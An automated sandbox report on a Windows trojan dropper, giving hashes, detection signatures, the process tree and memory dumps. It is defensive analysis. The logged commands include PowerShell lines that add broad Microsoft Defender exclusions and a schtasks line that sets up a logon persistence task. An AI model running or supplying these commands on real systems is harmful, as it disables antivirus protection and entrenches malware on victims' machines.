Analysis
-
max time kernel
136s -
max time network
126s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
06-12-2021 03:15
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe
Resource
win7-en-20211104
General
-
Target
SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe
-
Size
4.9MB
-
MD5
7b7cfe46454f0f7a9c046636eb66dda0
-
SHA1
9ef56977d9b96e81e42f94ef29b144698685e5d3
-
SHA256
47e2b9d18762b81536a9a236a382302f9fcb3114e3723a2e90277b903448b536
-
SHA512
28e5b8eca9048855829528d8e235e52168588c247e036acae791927b9f703394975c38dedcc01a6bdfcefdd1e580d882d97f6eec3a6983c1b21fb4a04cdd0cfd
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Executes dropped EXE 2 IoCs
Processes:
services64.exesihost32.exepid process 280 services64.exe 1464 sihost32.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
services64.exeSecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion services64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion services64.exe -
Loads dropped DLL 2 IoCs
Processes:
cmd.exeservices64.exepid process 1184 cmd.exe 280 services64.exe -
Processes:
resource yara_rule behavioral1/memory/736-58-0x000000013F360000-0x000000013F361000-memory.dmp themida \Users\Admin\AppData\Local\Temp\services64.exe themida C:\Users\Admin\AppData\Local\Temp\services64.exe themida behavioral1/memory/280-86-0x000000013FEE0000-0x000000013FEE1000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\services64.exe themida -
Processes:
SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exeservices64.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA services64.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exeservices64.exepid process 736 SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe 280 services64.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exepowershell.exepowershell.exeservices64.exepid process 736 SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe 596 powershell.exe 1904 powershell.exe 280 services64.exe 280 services64.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exepowershell.exepowershell.exeservices64.exedescription pid process Token: SeDebugPrivilege 736 SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe Token: SeDebugPrivilege 596 powershell.exe Token: SeDebugPrivilege 1904 powershell.exe Token: SeDebugPrivilege 280 services64.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.execmd.execmd.execmd.exeservices64.execmd.exedescription pid process target process PID 736 wrote to memory of 1008 736 SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe cmd.exe PID 736 wrote to memory of 1008 736 SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe cmd.exe PID 736 wrote to memory of 1008 736 SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe cmd.exe PID 1008 wrote to memory of 596 1008 cmd.exe powershell.exe PID 1008 wrote to memory of 596 1008 cmd.exe powershell.exe PID 1008 wrote to memory of 596 1008 cmd.exe powershell.exe PID 736 wrote to memory of 980 736 SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe cmd.exe PID 736 wrote to memory of 980 736 SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe cmd.exe PID 736 wrote to memory of 980 736 SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe cmd.exe PID 980 wrote to memory of 1828 980 cmd.exe schtasks.exe PID 980 wrote to memory of 1828 980 cmd.exe schtasks.exe PID 980 wrote to memory of 1828 980 cmd.exe schtasks.exe PID 1008 wrote to memory of 1904 1008 cmd.exe powershell.exe PID 1008 wrote to memory of 1904 1008 cmd.exe powershell.exe PID 1008 wrote to memory of 1904 1008 cmd.exe powershell.exe PID 736 wrote to memory of 1184 736 SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe cmd.exe PID 736 wrote to memory of 1184 736 SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe cmd.exe PID 736 wrote to memory of 1184 736 SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe cmd.exe PID 1184 wrote to memory of 280 1184 cmd.exe services64.exe PID 1184 wrote to memory of 280 1184 cmd.exe services64.exe PID 1184 wrote to memory of 280 1184 cmd.exe services64.exe PID 280 wrote to memory of 1728 280 services64.exe cmd.exe PID 280 wrote to memory of 1728 280 services64.exe cmd.exe PID 280 wrote to memory of 1728 280 services64.exe cmd.exe PID 1728 wrote to memory of 892 1728 cmd.exe powershell.exe PID 1728 wrote to memory of 892 1728 cmd.exe powershell.exe PID 1728 wrote to memory of 892 1728 cmd.exe powershell.exe PID 280 wrote to memory of 1464 280 services64.exe sihost32.exe PID 280 wrote to memory of 1464 280 services64.exe sihost32.exe PID 280 wrote to memory of 1464 280 services64.exe sihost32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe"1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904 -
C:\Windows\system32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"3⤵
- Creates scheduled task(s)
PID:1828 -
C:\Windows\system32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Users\Admin\AppData\Local\Temp\services64.exeC:\Users\Admin\AppData\Local\Temp\services64.exe3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:280 -
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵PID:892
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"4⤵
- Executes dropped EXE
PID:1464
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\services64.exeMD5
7b7cfe46454f0f7a9c046636eb66dda0
SHA19ef56977d9b96e81e42f94ef29b144698685e5d3
SHA25647e2b9d18762b81536a9a236a382302f9fcb3114e3723a2e90277b903448b536
SHA51228e5b8eca9048855829528d8e235e52168588c247e036acae791927b9f703394975c38dedcc01a6bdfcefdd1e580d882d97f6eec3a6983c1b21fb4a04cdd0cfd
-
C:\Users\Admin\AppData\Local\Temp\services64.exeMD5
7b7cfe46454f0f7a9c046636eb66dda0
SHA19ef56977d9b96e81e42f94ef29b144698685e5d3
SHA25647e2b9d18762b81536a9a236a382302f9fcb3114e3723a2e90277b903448b536
SHA51228e5b8eca9048855829528d8e235e52168588c247e036acae791927b9f703394975c38dedcc01a6bdfcefdd1e580d882d97f6eec3a6983c1b21fb4a04cdd0cfd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exeMD5
1674dd9c7a7775b73be309ad1c62ffd4
SHA144eca69c94e11a4ad6f186e3205d8a96150b228c
SHA256d223e6e836d93bf5af48c21fe6ec7a9e31dd4b351111cce77f0b3cd0a2679c0a
SHA512059918fc77df9663ad57879a50e1a2803a5d84c73117d2a991908043899a88cd16f4b1fb45bdfc93e3a446be6ddbe6546b11cc85553c245b810ea226fb93affd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exeMD5
1674dd9c7a7775b73be309ad1c62ffd4
SHA144eca69c94e11a4ad6f186e3205d8a96150b228c
SHA256d223e6e836d93bf5af48c21fe6ec7a9e31dd4b351111cce77f0b3cd0a2679c0a
SHA512059918fc77df9663ad57879a50e1a2803a5d84c73117d2a991908043899a88cd16f4b1fb45bdfc93e3a446be6ddbe6546b11cc85553c245b810ea226fb93affd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
7105da437756662a49da27785b01c756
SHA1f6dce822ef6eccb95c222c20d543555ef2d96d06
SHA2563611ca45b6d812868bedbb127b4d33af701e70a89b78b474ff635d6952275ce7
SHA512ba3e05b2fbc1468e9022ed76b15d5f345d5fc9bc82d3b9250376eb8283f9e8729c97fcb06eb83a12ea6ac9d7d5abf63138515e04f7125dbffb7e14e5368a1331
-
\Users\Admin\AppData\Local\Temp\services64.exeMD5
7b7cfe46454f0f7a9c046636eb66dda0
SHA19ef56977d9b96e81e42f94ef29b144698685e5d3
SHA25647e2b9d18762b81536a9a236a382302f9fcb3114e3723a2e90277b903448b536
SHA51228e5b8eca9048855829528d8e235e52168588c247e036acae791927b9f703394975c38dedcc01a6bdfcefdd1e580d882d97f6eec3a6983c1b21fb4a04cdd0cfd
-
\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exeMD5
1674dd9c7a7775b73be309ad1c62ffd4
SHA144eca69c94e11a4ad6f186e3205d8a96150b228c
SHA256d223e6e836d93bf5af48c21fe6ec7a9e31dd4b351111cce77f0b3cd0a2679c0a
SHA512059918fc77df9663ad57879a50e1a2803a5d84c73117d2a991908043899a88cd16f4b1fb45bdfc93e3a446be6ddbe6546b11cc85553c245b810ea226fb93affd
-
memory/280-102-0x00000000004F0000-0x00000000004F1000-memory.dmpFilesize
4KB
-
memory/280-100-0x000000001C240000-0x000000001C242000-memory.dmpFilesize
8KB
-
memory/280-86-0x000000013FEE0000-0x000000013FEE1000-memory.dmpFilesize
4KB
-
memory/280-99-0x000007FE80010000-0x000007FE80011000-memory.dmpFilesize
4KB
-
memory/280-98-0x00000000004E0000-0x00000000004E1000-memory.dmpFilesize
4KB
-
memory/280-83-0x0000000000000000-mapping.dmp
-
memory/596-61-0x0000000000000000-mapping.dmp
-
memory/596-67-0x0000000002120000-0x0000000002122000-memory.dmpFilesize
8KB
-
memory/596-68-0x0000000002122000-0x0000000002124000-memory.dmpFilesize
8KB
-
memory/596-69-0x0000000002124000-0x0000000002127000-memory.dmpFilesize
12KB
-
memory/596-64-0x000007FEEDFB0000-0x000007FEEEB0D000-memory.dmpFilesize
11.4MB
-
memory/596-70-0x000000000212B000-0x000000000214A000-memory.dmpFilesize
124KB
-
memory/596-62-0x000007FEFBFB1000-0x000007FEFBFB3000-memory.dmpFilesize
8KB
-
memory/736-81-0x0000000000080000-0x0000000000081000-memory.dmpFilesize
4KB
-
memory/736-66-0x0000000001FE0000-0x0000000001FE2000-memory.dmpFilesize
8KB
-
memory/736-58-0x000000013F360000-0x000000013F361000-memory.dmpFilesize
4KB
-
memory/736-57-0x000007FE80010000-0x000007FE80011000-memory.dmpFilesize
4KB
-
memory/736-56-0x0000000000070000-0x0000000000071000-memory.dmpFilesize
4KB
-
memory/892-89-0x0000000000000000-mapping.dmp
-
memory/980-63-0x0000000000000000-mapping.dmp
-
memory/1008-60-0x0000000000000000-mapping.dmp
-
memory/1184-80-0x0000000000000000-mapping.dmp
-
memory/1464-92-0x0000000000000000-mapping.dmp
-
memory/1464-95-0x000000013FA20000-0x000000013FA21000-memory.dmpFilesize
4KB
-
memory/1464-101-0x000000001BFB0000-0x000000001BFB2000-memory.dmpFilesize
8KB
-
memory/1728-88-0x0000000000000000-mapping.dmp
-
memory/1828-65-0x0000000000000000-mapping.dmp
-
memory/1904-79-0x000000000259B000-0x00000000025BA000-memory.dmpFilesize
124KB
-
memory/1904-78-0x000000001B780000-0x000000001BA7F000-memory.dmpFilesize
3.0MB
-
memory/1904-75-0x0000000002590000-0x0000000002592000-memory.dmpFilesize
8KB
-
memory/1904-76-0x0000000002592000-0x0000000002594000-memory.dmpFilesize
8KB
-
memory/1904-77-0x0000000002594000-0x0000000002597000-memory.dmpFilesize
12KB
-
memory/1904-74-0x000007FEEDFB0000-0x000007FEEEB0D000-memory.dmpFilesize
11.4MB
-
memory/1904-71-0x0000000000000000-mapping.dmp